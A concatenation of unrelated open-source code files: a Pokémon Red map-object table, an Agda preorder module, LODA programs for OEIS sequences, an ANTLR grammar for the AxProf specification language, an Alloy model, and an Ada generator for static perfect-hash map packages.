SSAnne3F_Object: db $c ; border block db 2 ; warps warp 0, 3, 0, SS_ANNE_BOW warp 19, 3, 7, SS_ANNE_2F db 0 ; signs db 1 ; objects object SPRITE_SAILOR, 9, 3, WALK, 2, 1 ; person ; warp-to warp_to 0, 3, SS_ANNE_3F_WIDTH ; SS_ANNE_BOW warp_to 19, 3, SS_ANNE_3F_WIDTH ; SS_ANNE_2F
test/asset/agda-stdlib-1.0/Relation/Binary/Properties/Preorder.agda
omega12345/agda-mode
0
7219
<reponame>omega12345/agda-mode<gh_stars>0 ------------------------------------------------------------------------ -- The Agda standard library -- -- Properties satisfied by preorders ------------------------------------------------------------------------ {-# OPTIONS --without-K --safe #-} open import Relation.Binary module Relation.Binary.Properties.Preorder {p₁ p₂ p₃} (P : Preorder p₁ p₂ p₃) where open import Function open import Data.Product as Prod open Relation.Binary.Preorder P -- The inverse relation is also a preorder. invIsPreorder : IsPreorder _≈_ (flip _∼_) invIsPreorder = record { isEquivalence = isEquivalence ; reflexive = reflexive ∘ Eq.sym ; trans = flip trans } invPreorder : Preorder p₁ p₂ p₃ invPreorder = record { isPreorder = invIsPreorder } ------------------------------------------------------------------------ -- For every preorder there is an induced equivalence InducedEquivalence : Setoid _ _ InducedEquivalence = record { _≈_ = λ x y → x ∼ y × y ∼ x ; isEquivalence = record { refl = (refl , refl) ; sym = swap ; trans = Prod.zip trans (flip trans) } }
oeis/038/A038138.asm
neoneye/loda-programs
11
5446
<filename>oeis/038/A038138.asm ; A038138: Order of n (mod 7). ; Submitted by <NAME> ; 0,1,3,6,3,6,2,0,1,3,6,3,6,2,0,1,3,6,3,6,2,0,1,3,6,3,6,2,0,1,3,6,3,6,2,0,1,3,6,3,6,2,0,1,3,6,3,6,2,0,1,3,6,3,6,2,0,1,3,6,3,6,2,0,1,3,6,3,6,2,0,1,3,6,3,6,2,0,1,3,6,3,6,2,0,1,3,6,3,6,2,0,1,3,6,3,6,2,0,1 mod $0,7 seq $0,19300 ; First n elements of Thue-Morse sequence A010060 read as a binary number. mod $0,10
programs/oeis/084/A084101.asm
karttu/loda
0
92031
<gh_stars>0 ; A084101: Expansion of (1+x)^2/((1-x)*(1+x^2)). ; 1,3,3,1,1,3,3,1,1,3,3,1,1,3,3,1,1,3,3,1,1,3,3,1,1,3,3,1,1,3,3,1,1,3,3,1,1,3,3,1,1,3,3,1,1,3,3,1,1,3,3,1,1,3,3,1,1,3,3,1,1,3,3,1,1,3,3,1,1,3,3,1,1,3,3,1,1,3,3,1,1,3,3,1,1,3,3,1,1,3,3,1,1,3,3,1,1,3,3,1,1,3,3,1,1 mod $0,4 mov $1,3 bin $1,$0
AxProf/checkerGen/AxProfSpec.g4
rod-lin/AxProf
6
4473
/* AxProf specification generator grammar */ grammar AxProfSpec; @header{ import java.util.List; import java.util.ArrayList; } /* Type rule supports real values, matrices of real values, lists, and maps */ type returns [AST.dataType value] : 'real' { $value = new AST.dataType(AST.dataType.REAL); } | 'matrix' { $value = new AST.dataType(AST.dataType.MATRIX); } | 'list' 'of' it=type { $value = new AST.dataType(AST.dataType.LIST,$it.value); } | 'map' 'from' kt=type 'to' vt=type { $value = new AST.dataType(AST.dataType.MAP,$kt.value,$vt.value); } | '(' t=type ')' { $value = $t.value; } //evaluation order disambiguation ; /* Type declaration rule associates a name with a type for type checking and code generation */ typeDecl returns [AST.typeDecl value] : name=Id t=type ';' { $value = new AST.typeDecl($name.getText(),$t.value); } ; /* Type declaration list rule a list of one or more type declarations present at the start of the specification the types of the input and output must be specified; this is enforced later */ typeDeclList returns [List<AST.typeDecl> value] @init{ $value = new ArrayList<AST.typeDecl>(); } : (td=typeDecl { $value.add($td.value); } )+ ; /* Main specification rule consists of a list of type declarations, followed by optional time, space, and accuracy specifications in that order */ spec returns [AST.spec value] @init{ $value = new AST.spec(); } : tds=typeDeclList { $value.addDecls($tds.value); } ('TIME' de1=dataExp ';' { $value.addTime($de1.value); })? ('SPACE' de2=dataExp ';' { $value.addSpace($de2.value); })? ('ACC' be=boolExp { $value.addAcc($be.value); })? ; /* Boolean expression rule consists of the following general types of rules: 1) for all (universal quantification) 2) let 3) item present in set 4) binary comparisions 5) boolean operations (and, or, not) */ boolExp returns [AST.boolExp value] : 'forall' ranges=rangeList ':' be=boolExp { $value = new AST.forall($ranges.value,$be.value); } | 'let' name=Id '=' dat=dataExp 'in' be=boolExp { $value = new AST.let($name.getText(),$dat.value,$be.value); } | item=dataExp 'in' dat=dataExp { $value = new AST.isInData($item.value,$dat.value); } | de1=dataExp '.==' de2=dataExp { $value = new AST.approxEq($de1.value,$de2.value); } | de1=dataExp '==' de2=dataExp { $value = new AST.comparison($de1.value,"==",$de2.value); } | de1=dataExp '!=' de2=dataExp { $value = new AST.comparison($de1.value,"!=",$de2.value); } | de1=dataExp '>' de2=dataExp { $value = new AST.comparison($de1.value,">" ,$de2.value); } | de1=dataExp '<' de2=dataExp { $value = new AST.comparison($de1.value,"<" ,$de2.value); } | de1=dataExp '>=' de2=dataExp { $value = new AST.comparison($de1.value,">=",$de2.value); } | de1=dataExp '<=' de2=dataExp { $value = new AST.comparison($de1.value,"<=",$de2.value); } | be1=boolExp '&&' be2=boolExp { $value = new AST.boolAndOr($be1.value,"and",$be2.value); } | be1=boolExp '||' be2=boolExp { $value = new AST.boolAndOr($be1.value,"or" ,$be2.value); } | '!' be=boolExp { $value = new AST.boolNot($be.value); } | '(' be=boolExp ')' { $value = $be.value; } //evaluation order disambiguation ; /* Data expression rule rule for all types of data other than boolean consists of the following general types of rules: 1) constants 2) probability and expected values 3) list/set/map lookup 4) variables 5) lists/tuples 6) numerical binary operations 7) list/set/map size 8) external function call */ dataExp returns [AST.dataExp value] : realVal=Real { $value = new AST.realConst($realVal.getText()); } | 'Probability' 'over' 'inputs' '[' be=boolExp ']' { $value = new AST.probabilityInputs($be.value); } | 'Probability' 'over' 'runs' '[' be=boolExp ']' { $value = new AST.probabilityRuns($be.value); } | 'Probability' 'over' ranges=rangeList '[' be=boolExp ']' { $value = new AST.probabilityItems($ranges.value,$be.value); } | 'Expectation' 'over' 'inputs' '[' de=dataExp ']' { $value = new AST.expectationInputs($de.value); } | 'Expectation' 'over' 'runs' '[' de=dataExp ']' { $value = new AST.expectationRuns($de.value); } | 'Expectation' 'over' ranges=rangeList '[' de=dataExp ']' { $value = new AST.expectationItems($ranges.value,$de.value); } | coll=dataExp '[' key=dataExp ']' { $value = new AST.lookup($coll.value,$key.value); } | name=Id { $value = new AST.varId($name.getText()); } | expList=dataExpList { $value = new AST.dataExpList($expList.value); } | de1=dataExp '+' de2=dataExp { $value = new AST.dataOp($de1.value,"+",$de2.value); } | de1=dataExp '-' de2=dataExp { $value = new AST.dataOp($de1.value,"-",$de2.value); } | de1=dataExp '*' de2=dataExp { $value = new AST.dataOp($de1.value,"*",$de2.value); } | de1=dataExp '/' de2=dataExp { $value = new AST.dataOp($de1.value,"/",$de2.value); } | de1=dataExp '^' de2=dataExp { $value = new AST.dataOp($de1.value,"**",$de2.value); } | '|' coll=dataExp '|' { $value = new AST.dataSize($coll.value); } | name=Id args=funcArgs { $value = new AST.funcCall($name.getText(),$args.value); } | '(' de=dataExp ')' { $value = $de.value; } //evaluation order disambiguation ; /* Data expression list rule for constructing python style lists of data values */ dataExpList returns [List<AST.dataExp> value] @init{ $value = new ArrayList<AST.dataExp>(); } : '[' e1=dataExp { $value.add($e1.value); } ( ',' er=dataExp { $value.add($er.value); } )* ']' ; /* Range specification rule for specifying a range for universal quantification or probability/expected value specification supports three types of ranges: 1) range of items in a list/set/map-keys; similar to python "for item in collection:" 2) range of *unique* items in a list/set/map-keys; similar to python "for item in set(collection):" 3) range of indices of items in a list/set/map-keys; similar to python "for index in range(len(collection)):" */ range returns [AST.range value] : item=dataExp 'in' col=dataExp { $value = new AST.range($item.value,$col.value,AST.range.DIRECT); } | item=dataExp 'in' 'uniques' '(' col=dataExp ')' { $value = new AST.range($item.value,$col.value,AST.range.UNIQUE); } | item=dataExp 'in' 'indices' '(' col=dataExp ')' { $value = new AST.range($item.value,$col.value,AST.range.INDEX); } ; /* Range list rule for specifying multiple ranges at once necessary because the entire multidimensional range must be considered at once for universal quantification or probability/expected value specification */ rangeList returns [List<AST.range> value] @init{ $value = new ArrayList<AST.range>(); } : r1=range { $value.add($r1.value); } ( ',' rr=range { $value.add($rr.value); } )* ; /* Function argument rule wrapper around data expression rule - separate for future extensibility */ funcArg returns [AST.ASTNode value] : exp=dataExp { $value = $exp.value; } ; /* Function argument list rule also looks for the parenthesis around the argument(s) */ funcArgs returns [List<AST.ASTNode> value] @init{ $value = new ArrayList<AST.ASTNode>(); } : '(' ( arg1=funcArg { $value.add($arg1.value); } ( ',' args=funcArg { $value.add($args.value); } )* )? ')' ; /* Id rule must start with a letter or underscore other characters can be letters, numbers, underscore, or period */ Id : [a-zA-Z_][a-zA-Z0-9_.]* ; /* Real constant rule */ Real : '-'?[0-9]+('.'[0-9]+)? ; /* Skip whitespace */ WS : [ \n\r] -> skip ;
alloy4fun_models/trashltl/models/17/JitedxQKrywDtohF4.als
Kaixi26/org.alloytools.alloy
0
4812
<filename>alloy4fun_models/trashltl/models/17/JitedxQKrywDtohF4.als open main pred idJitedxQKrywDtohF4_prop18 { all f : Protected | always (f in Trash' => always (f not in Protected)) } pred __repair { idJitedxQKrywDtohF4_prop18 } check __repair { idJitedxQKrywDtohF4_prop18 <=> prop18o }
src/natools-static_hash_maps.adb
faelys/natools
0
25298
<filename>src/natools-static_hash_maps.adb ------------------------------------------------------------------------------ -- Copyright (c) 2014, <NAME> -- -- -- -- Permission to use, copy, modify, and distribute this software for any -- -- purpose with or without fee is hereby granted, provided that the above -- -- copyright notice and this permission notice appear in all copies. -- -- -- -- THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES -- -- WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF -- -- MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR -- -- ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES -- -- WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN -- -- ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF -- -- OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. -- ------------------------------------------------------------------------------ with Ada.Calendar.Formatting; with Ada.Calendar.Time_Zones; with Ada.Characters.Handling; with Ada.Containers.Indefinite_Doubly_Linked_Lists; with Ada.Directories; with Ada.Text_IO; with GNAT.Perfect_Hash_Generators; package body Natools.Static_Hash_Maps is package String_Lists is new Ada.Containers.Indefinite_Doubly_Linked_Lists (String); procedure Add_Categorization (Path : in String; Categorization : in Package_Categorization); function File_Name (Package_Name : in String) return String; -- Convert a package name into a file name, the GNAT way function Image (Pos : Natural) return String; -- Trimmed image, for suffix construction function Image (Offset : Ada.Calendar.Time_Zones.Time_Offset) return String; procedure Put_Categorization (Output : in Ada.Text_IO.File_Type; Categorization : in Package_Categorization; Name : in String := ""); procedure Write_Map_Body (Map : in Map_Description; Prefix : in String; File : in Ada.Text_IO.File_Type); procedure Write_Map_Hash_Package (Map : in Map_Description); procedure Write_Map_Private_Spec (Map : in Map_Description; Prefix : in String; File : in Ada.Text_IO.File_Type); procedure Write_Map_Public_Spec (Map : in Map_Description; File : in Ada.Text_IO.File_Type); procedure Write_Map_With (Map : in Map_Description; File : in Ada.Text_IO.File_Type); -- Output fragments relevant for the given map procedure Write_Package (Pkg : in Map_Package; Spec_File, Body_File : in Ada.Text_IO.File_Type; Test : in Boolean := False); -- Output a complete map package procedure Write_Test (Map : in Map_Description; Prefix : in String; File : in Ada.Text_IO.File_Type); -- Output test loop for the hash function ------------------------ -- Package Generators -- ------------------------ procedure Add_Categorization (Path : in String; Categorization : in Package_Categorization) is File : Ada.Text_IO.File_Type; Matches : Natural := 0; Contents : String_Lists.List; begin if Categorization = Default_Categorization then return; end if; Ada.Text_IO.Open (File, Ada.Text_IO.In_File, Path); while not Ada.Text_IO.End_Of_File (File) loop Contents.Append (Ada.Text_IO.Get_Line (File)); end loop; Ada.Text_IO.Close (File); Ada.Text_IO.Open (File, Ada.Text_IO.Out_File, Path); for Line of Contents loop Ada.Text_IO.Put_Line (File, Line); if Line'Length >= 8 and then Line (Line'First .. Line'First + 7) = "package " and then Line (Line'Last - 2 .. Line'Last) = " is" then Matches := Matches + 1; Put_Categorization (File, Categorization); end if; end loop; Ada.Text_IO.Close (File); pragma Assert (Matches = 1); end Add_Categorization; function File_Name (Package_Name : in String) return String is Result : String := Ada.Characters.Handling.To_Lower (Package_Name); begin for I in Result'Range loop if Result (I) = '.' then Result (I) := '-'; end if; end loop; return Result; end File_Name; function Image (Pos : Natural) return String is Result : constant String := Natural'Image (Pos); begin pragma Assert (Result (Result'First) = ' '); return Result (Result'First + 1 .. Result'Last); end Image; function Image (Offset : Ada.Calendar.Time_Zones.Time_Offset) return String is use type Ada.Calendar.Time_Zones.Time_Offset; H : constant Natural := Natural (abs Offset) / 60; M : constant Natural := Natural (abs Offset) mod 60; Sign : Character := '+'; begin if Offset < 0 then Sign := '-'; end if; return String'(1 => Sign, 2 => Character'Val (48 + H / 10), 3 => Character'Val (48 + H mod 10), 4 => Character'Val (48 + M / 10), 5 => Character'Val (48 + M mod 10)); end Image; procedure Put_Categorization (Output : in Ada.Text_IO.File_Type; Categorization : in Package_Categorization; Name : in String := "") is function Prefix return String; function Suffix return String; function Prefix return String is begin if Name = "" then return " pragma "; else return "pragma "; end if; end Prefix; function Suffix return String is begin if Name = "" then return ""; else return " (" & Name & ')'; end if; end Suffix; begin case Categorization is when Pure => Ada.Text_IO.Put_Line (Output, Prefix & "Pure" & Suffix & ';'); when Preelaborate => Ada.Text_IO.Put_Line (Output, Prefix & "Preelaborate" & Suffix & ';'); when Default_Categorization => null; end case; end Put_Categorization; procedure Write_Map_Body (Map : in Map_Description; Prefix : in String; File : in Ada.Text_IO.File_Type) is begin if Map.Indefinite then Ada.Text_IO.Put_Line (File, " function " & Prefix & "_Elements (Hash : " & Prefix & "_Hash)"); Ada.Text_IO.Put_Line (File, " return " & To_String (Map.Element_Type) & " is"); Ada.Text_IO.Put_Line (File, " begin"); Ada.Text_IO.Put_Line (File, " case Hash is"); declare Pos : Natural := 0; Cursor : Node_Lists.Cursor := Map.Nodes.First; begin while Node_Lists.Has_Element (Cursor) loop Ada.Text_IO.Put_Line (File, " when " & Image (Pos) & " =>"); Ada.Text_IO.Put_Line (File, " return " & To_String (Node_Lists.Element (Cursor).Name) & ';'); Node_Lists.Next (Cursor); Pos := Pos + 1; end loop; end; Ada.Text_IO.Put_Line (File, " end case;"); Ada.Text_IO.Put_Line (File, " end " & Prefix & "_Elements;"); Ada.Text_IO.New_Line (File); end if; Ada.Text_IO.Put_Line (File, " function " & To_String (Map.Function_Name) & " (Key : String) return " & To_String (Map.Element_Type) & " is"); Ada.Text_IO.Put_Line (File, " N : constant Natural"); Ada.Text_IO.Put_Line (File, " := " & To_String (Map.Hash_Package_Name) & ".Hash (Key);"); Ada.Text_IO.Put_Line (File, " begin"); Ada.Text_IO.Put_Line (File, " if " & Prefix & "_Keys (N).all = Key then"); Ada.Text_IO.Put_Line (File, " return " & Prefix & "_Elements (N);"); Ada.Text_IO.Put_Line (File, " else"); if To_String (Map.Not_Found) /= "" then Ada.Text_IO.Put_Line (File, " return " & To_String (Map.Not_Found) & ';'); else Ada.Text_IO.Put_Line (File, " raise Constraint_Error " & "with ""Key """""" & Key & """""" not in map"";"); end if; Ada.Text_IO.Put_Line (File, " end if;"); Ada.Text_IO.Put_Line (File, " end " & To_String (Map.Function_Name) & ';'); end Write_Map_Body; procedure Write_Map_Hash_Package (Map : in Map_Description) is Seed : Natural := 2; NK : constant Float := Float (Map.Nodes.Length); NV : Natural := Natural (Map.Nodes.Length) * 2 + 1; Cursor : Node_Lists.Cursor := Map.Nodes.First; begin while Node_Lists.Has_Element (Cursor) loop GNAT.Perfect_Hash_Generators.Insert (To_String (Node_Lists.Element (Cursor).Key)); Node_Lists.Next (Cursor); end loop; loop begin GNAT.Perfect_Hash_Generators.Initialize (Seed, Float (NV) / NK); GNAT.Perfect_Hash_Generators.Compute; exit; exception when GNAT.Perfect_Hash_Generators.Too_Many_Tries => null; end; Seed := Seed * NV; begin GNAT.Perfect_Hash_Generators.Initialize (Seed, Float (NV) / NK); GNAT.Perfect_Hash_Generators.Compute; exit; exception when GNAT.Perfect_Hash_Generators.Too_Many_Tries => null; end; NV := NV + 1; Seed := NV; end loop; GNAT.Perfect_Hash_Generators.Produce (To_String (Map.Hash_Package_Name)); GNAT.Perfect_Hash_Generators.Finalize; exception when others => GNAT.Perfect_Hash_Generators.Finalize; raise; end Write_Map_Hash_Package; procedure Write_Map_Private_Spec (Map : in Map_Description; Prefix : in String; File : in Ada.Text_IO.File_Type) is Last : constant Natural := Positive (Map.Nodes.Length) - 1; Pos : Natural; Cursor : Node_Lists.Cursor; begin Pos := 0; Cursor := Map.Nodes.First; while Node_Lists.Has_Element (Cursor) loop Ada.Text_IO.Put_Line (File, " " & Prefix & "_Key_" & Image (Pos) & " : aliased constant String := """ & To_String (Node_Lists.Element (Cursor).Key) & """;"); Pos := Pos + 1; Node_Lists.Next (Cursor); end loop; Ada.Text_IO.Put_Line (File, " " & Prefix & "_Keys : constant array (0 .. " & Image (Last) & ") of access constant String"); Pos := 0; Cursor := Map.Nodes.First; while Node_Lists.Has_Element (Cursor) loop if Pos = 0 then Ada.Text_IO.Put (File, " := ("); else Ada.Text_IO.Put (File, " "); end if; Ada.Text_IO.Put (File, Prefix & "_Key_" & Image (Pos) & "'Access"); if Pos = Last then Ada.Text_IO.Put_Line (File, ");"); else Ada.Text_IO.Put_Line (File, ","); end if; Pos := Pos + 1; Node_Lists.Next (Cursor); end loop; if Map.Indefinite then Ada.Text_IO.Put_Line (File, " subtype " & Prefix & "_Hash is Natural range 0 .. " & Image (Last) & ';'); Ada.Text_IO.Put_Line (File, " function " & Prefix & "_Elements (Hash : " & Prefix & "_Hash)"); Ada.Text_IO.Put_Line (File, " return " & To_String (Map.Element_Type) & ';'); else Ada.Text_IO.Put_Line (File, " " & Prefix & "_Elements : constant array (0 .. " & Image (Last) & ") of " & To_String (Map.Element_Type)); Pos := 0; Cursor := Map.Nodes.First; while Node_Lists.Has_Element (Cursor) loop if Pos = 0 then Ada.Text_IO.Put (File, " := ("); else Ada.Text_IO.Put (File, " "); end if; Ada.Text_IO.Put (File, To_String (Node_Lists.Element (Cursor).Name)); if Pos = Last then Ada.Text_IO.Put_Line (File, ");"); else Ada.Text_IO.Put_Line (File, ","); end if; Pos := Pos + 1; Node_Lists.Next (Cursor); end loop; end if; end Write_Map_Private_Spec; procedure Write_Map_Public_Spec (Map : in Map_Description; File : in Ada.Text_IO.File_Type) is begin Ada.Text_IO.Put_Line (File, " function " & To_String (Map.Function_Name) & " (Key : String) return " & To_String (Map.Element_Type) & ';'); end Write_Map_Public_Spec; procedure Write_Map_With (Map : in Map_Description; File : in Ada.Text_IO.File_Type) is begin Ada.Text_IO.Put_Line (File, "with " & To_String (Map.Hash_Package_Name) & ';'); end Write_Map_With; procedure Write_Package (Pkg : in Map_Package; Spec_File, Body_File : in Ada.Text_IO.File_Type; Test : in Boolean := False) is type Stage is (Hash_Package, Public_Spec, Private_Spec, Body_With, Body_Contents, Test_Body); Current_Stage : Stage; Map_Pos : Natural := 0; procedure Process (Element : in Map_Description); procedure Query (Cursor : in Map_Lists.Cursor); procedure Process (Element : in Map_Description) is Prefix : constant String := "Map_" & Image (Map_Pos + 1); begin case Current_Stage is when Hash_Package => Write_Map_Hash_Package (Element); Add_Categorization (Ada.Directories.Compose ("", File_Name (To_String (Element.Hash_Package_Name)), "ads"), Pkg.Categorization); when Public_Spec => Write_Map_Public_Spec (Element, Spec_File); when Private_Spec => Ada.Text_IO.New_Line (Spec_File); Write_Map_Private_Spec (Element, Prefix, Spec_File); when Body_With => Write_Map_With (Element, Body_File); when Body_Contents => Ada.Text_IO.New_Line (Body_File); Write_Map_Body (Element, Prefix, Body_File); Ada.Text_IO.New_Line (Body_File); when Test_Body => Write_Test (Element, Prefix, Body_File); Ada.Text_IO.New_Line (Body_File); end case; Map_Pos := Map_Pos + 1; end Process; procedure Query (Cursor : in Map_Lists.Cursor) is begin Map_Lists.Query_Element (Cursor, Process'Access); end Query; begin Current_Stage := Hash_Package; Map_Pos := 0; Pkg.Maps.Iterate (Query'Access); Write_Headers : declare Now : constant Ada.Calendar.Time := Ada.Calendar.Clock; Offset : constant Ada.Calendar.Time_Zones.Time_Offset := Ada.Calendar.Time_Zones.UTC_Time_Offset (Now); Header : constant String := "-- Generated at " & Ada.Calendar.Formatting.Image (Now, False, Offset) & ' ' & Image (Offset) & " by Natools.Static_Hash_Maps"; Description : constant String := To_String (Pkg.Description); begin Ada.Text_IO.Put_Line (Spec_File, Header); Ada.Text_IO.Put_Line (Body_File, Header); if Description'Length > 0 then Ada.Text_IO.Put_Line (Spec_File, "-- " & Description); Ada.Text_IO.Put_Line (Body_File, "-- " & Description); end if; Ada.Text_IO.New_Line (Spec_File); Ada.Text_IO.New_Line (Body_File); end Write_Headers; if Test then declare Name : constant String := To_String (Pkg.Name) & '.' & To_String (Pkg.Test_Child); begin Ada.Text_IO.Put_Line (Spec_File, "function " & Name); Ada.Text_IO.Put_Line (Spec_File, " return Boolean;"); Put_Categorization (Spec_File, Pkg.Categorization, Name); Current_Stage := Body_With; Map_Pos := 0; Pkg.Maps.Iterate (Query'Access); Ada.Text_IO.Put_Line (Body_File, "function " & Name); Ada.Text_IO.Put_Line (Body_File, " return Boolean is"); Ada.Text_IO.Put_Line (Body_File, "begin"); Current_Stage := Test_Body; Map_Pos := 0; Pkg.Maps.Iterate (Query'Access); Ada.Text_IO.Put_Line (Body_File, " return True;"); Ada.Text_IO.Put_Line (Body_File, "end " & Name & ';'); end; return; end if; if Pkg.Priv then Ada.Text_IO.Put (Spec_File, "private "); end if; Ada.Text_IO.Put_Line (Spec_File, "package " & To_String (Pkg.Name) & " is"); Put_Categorization (Spec_File, Pkg.Categorization); Ada.Text_IO.New_Line (Spec_File); declare Declarations : constant String := To_String (Pkg.Extra_Declarations); begin if Declarations'Length > 0 then Ada.Text_IO.Put_Line (Spec_File, Declarations); Ada.Text_IO.New_Line (Spec_File); end if; end; Current_Stage := Public_Spec; Map_Pos := 0; Pkg.Maps.Iterate (Query'Access); Ada.Text_IO.New_Line (Spec_File); Ada.Text_IO.Put_Line (Spec_File, "private"); Current_Stage := Private_Spec; Map_Pos := 0; Pkg.Maps.Iterate (Query'Access); Ada.Text_IO.New_Line (Spec_File); Ada.Text_IO.Put_Line (Spec_File, "end " & To_String (Pkg.Name) & ';'); Current_Stage := Body_With; Map_Pos := 0; Pkg.Maps.Iterate (Query'Access); Ada.Text_IO.New_Line (Body_File); Ada.Text_IO.Put_Line (Body_File, "package body " & To_String (Pkg.Name) & " is"); Current_Stage := Body_Contents; Map_Pos := 0; Pkg.Maps.Iterate (Query'Access); Ada.Text_IO.Put_Line (Body_File, "end " & To_String (Pkg.Name) & ';'); end Write_Package; procedure Write_Test (Map : in Map_Description; Prefix : in String; File : in Ada.Text_IO.File_Type) is Key_Array_Name : constant String := Prefix & "_Keys"; begin Ada.Text_IO.Put_Line (File, " for I in " & Key_Array_Name & "'Range loop"); Ada.Text_IO.Put_Line (File, " if " & To_String (Map.Hash_Package_Name) & ".Hash"); Ada.Text_IO.Put_Line (File, " (" & Key_Array_Name & " (I).all) /= I"); Ada.Text_IO.Put_Line (File, " then"); Ada.Text_IO.Put_Line (File, " return False;"); Ada.Text_IO.Put_Line (File, " end if;"); Ada.Text_IO.Put_Line (File, " end loop;"); end Write_Test; ------------------------------- -- Key-Name Pair Constructor -- ------------------------------- function Node (Key, Name : String) return Map_Node is begin return (Key => Hold (Key), Name => Hold (Name)); end Node; --------------------------------- -- Map Description Subprograms -- --------------------------------- procedure Reset (Self : out Map_Description) is begin Self := (Element_Type => Hold (""), Hash_Package_Name => Hold (""), Function_Name => Hold (""), Not_Found => Hold (""), Nodes => Node_Lists.Empty_List, Indefinite => False); end Reset; procedure Insert (Self : in out Map_Description; Key : in String; Element_Name : in String) is begin Self.Nodes.Append (Node (Key, Element_Name)); end Insert; procedure Set_Definite (Self : in out Map_Description) is begin Self.Indefinite := False; end Set_Definite; procedure Set_Element_Type (Self : in out Map_Description; Name : in String) is begin Self.Element_Type := Hold (Name); end Set_Element_Type; procedure Set_Function_Name (Self : in out Map_Description; Name : in String) is begin Self.Function_Name := Hold (Name); end Set_Function_Name; procedure Set_Hash_Package_Name (Self : in out Map_Description; Name : in String) is begin Self.Hash_Package_Name := Hold (Name); end Set_Hash_Package_Name; procedure Set_Indefinite (Self : in out Map_Description; Indefinite : in Boolean := True) is begin Self.Indefinite := Indefinite; end Set_Indefinite; procedure Set_Not_Found (Self : in out Map_Description; Name : in String) is begin Self.Not_Found := Hold (Name); end Set_Not_Found; function Map (Element_Type : String; Nodes : Node_Array; Hash_Package_Name : String := ""; Function_Name : String := "Element"; Not_Found : String := ""; Indefinite : Boolean := False) return Map_Description is Result : Map_Description := (Element_Type => Hold (Element_Type), Hash_Package_Name => Hold (Hash_Package_Name), Function_Name => Hold (Function_Name), Not_Found => Hold (Not_Found), Nodes => Node_Lists.Empty_List, Indefinite => Indefinite); begin for I in Nodes'Range loop Result.Nodes.Append (Nodes (I)); end loop; return Result; end Map; ---------------------------- -- Map Package Primitives -- ---------------------------- procedure Open (Self : in out Map_Package; Name : in String; Private_Child : in Boolean := False) is begin Self.Name := Hold (Name); Self.Description := Hold (""); Self.Priv := Private_Child; Self.Maps.Clear; end Open; procedure Close (Self : in out Map_Package) is begin Self.Name := Hold (""); Self.Maps.Clear; end Close; procedure Set_Categorization (Self : in out Map_Package; Categorization : in Package_Categorization) is begin Self.Categorization := Categorization; end Set_Categorization; procedure Set_Description (Self : in out Map_Package; Description : in String) is begin Self.Description := Hold (Description); end Set_Description; procedure Set_Extra_Declarations (Self : in out Map_Package; Declarations : in String) is begin Self.Extra_Declarations := Hold (Declarations); end Set_Extra_Declarations; procedure Set_Private_Child (Self : in out Map_Package; Private_Child : in Boolean := True) is begin Self.Priv := Private_Child; end Set_Private_Child; procedure Set_Test_Child (Self : in out Map_Package; Test_Child : in String) is begin Self.Test_Child := Hold (Test_Child); end Set_Test_Child; procedure Add_Map (Self : in out Map_Package; Map : in Map_Description) is begin if To_String (Self.Name) = "" then raise Constraint_Error with "Add_Map on non-opened static hash map package"; end if; Self.Maps.Append (Map); end Add_Map; procedure Commit (Self : in out Map_Package) is begin if To_String (Self.Name) = "" then raise Constraint_Error with "Commit on static hash map package without a name"; end if; if Self.Maps.Is_Empty then raise Constraint_Error with "Commit on static hash map package without any map"; end if; declare Package_Name : constant String := To_String (Self.Name); Base_Name : constant String := File_Name (Package_Name); Spec_File, Body_File : Ada.Text_IO.File_Type; begin Ada.Text_IO.Create (File => Spec_File, Name => Ada.Directories.Compose ("", Base_Name, "ads")); Ada.Text_IO.Create (File => Body_File, Name => Ada.Directories.Compose ("", Base_Name, "adb")); Write_Package (Self, Spec_File, Body_File); Ada.Text_IO.Close (Spec_File); Ada.Text_IO.Close (Body_File); end; if To_String (Self.Test_Child) /= "" then declare Unit_Name : constant String := To_String (Self.Name) & '.' & To_String (Self.Test_Child); Base_Name : constant String := File_Name (Unit_Name); Spec_File, Body_File : Ada.Text_IO.File_Type; begin Ada.Text_IO.Create (File => Spec_File, Name => Ada.Directories.Compose ("", Base_Name, "ads")); Ada.Text_IO.Create (File => Body_File, Name => Ada.Directories.Compose ("", Base_Name, "adb")); Write_Package (Self, Spec_File, Body_File, Test => True); Ada.Text_IO.Close (Spec_File); Ada.Text_IO.Close (Body_File); end; end if; end Commit; ------------------------- -- Combined Procedures -- ------------------------- procedure Generate_Package (Name : in String; Single_Map : in Map_Description; Private_Child : in Boolean := False) is Object : Map_Package; begin Open (Object, Name, Private_Child); Add_Map (Object, Single_Map); Commit (Object); end Generate_Package; procedure Generate_Package (Name : in String; Maps : in Map_Array; Private_Child : in Boolean := False) is Object : Map_Package; begin Open (Object, Name, Private_Child); for I in Maps'Range loop Add_Map (Object, Maps (I)); end loop; Commit (Object); end Generate_Package; end Natools.Static_Hash_Maps;
Transynther/x86/_processed/AVXALIGN/_zr_/i7-7700_9_0xca.log_21829_958.asm
ljhsiun2/medusa
9
82237
